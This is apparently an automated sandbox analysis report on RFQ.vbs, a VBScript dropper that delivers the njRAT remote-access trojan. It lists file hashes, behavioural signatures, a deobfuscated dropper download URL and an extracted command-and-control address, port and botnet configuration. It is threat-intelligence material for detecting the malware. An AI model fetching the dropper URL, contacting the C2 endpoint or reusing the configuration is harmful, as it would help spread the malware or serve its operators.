RFQ.vbs

General
Target

RFQ.vbs

Size

7KB

Sample

210917-vm1cfsgac2

Score
10 /10
MD5

344aaf64e1d6be52690b5006b4e7e407

SHA1

7d23e39c1aefae326ec42b82bdfdcae504d2662f

SHA256

a078a2a795317c2e46fbb857f9f2cda679731bf8276f19a8d9c2fb2b3c076f27

SHA512

c2064b2c5dd9cc8ba22f9b9136e71eabcfbd16b89d8d0ec3cd7b6945d4244045ebe7fe22450728c0de5ce2278926c8444dd2a043c82471a34f9ae43932a4b8f3

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://13.112.210.240/bypass.txt

Extracted

Family njrat
Version 0.7d
Botnet HacKed
C2

103.153.78.241:7851

Attributes
reg_key
c111af59b6283a846969092a2400626a
splitter
|'|'|
Targets
Target

RFQ.vbs

MD5

344aaf64e1d6be52690b5006b4e7e407

Filesize

7KB

Score
10 /10
SHA1

7d23e39c1aefae326ec42b82bdfdcae504d2662f

SHA256

a078a2a795317c2e46fbb857f9f2cda679731bf8276f19a8d9c2fb2b3c076f27

SHA512

c2064b2c5dd9cc8ba22f9b9136e71eabcfbd16b89d8d0ec3cd7b6945d4244045ebe7fe22450728c0de5ce2278926c8444dd2a043c82471a34f9ae43932a4b8f3

Tags

Signatures

  • njRAT/Bladabindi

    Description

    Widely used RAT written in .NET.

    Tags

  • Blocklisted process makes network request

  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Suspicious use of SetThreadContext

Related Tasks

MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Execution
            Exfiltration
              Impact
                Initial Access
                  Lateral Movement
                    Privilege Escalation
                      Tasks

                      static1

                      behavioral1

                      10/10

                      behavioral2

                      10/10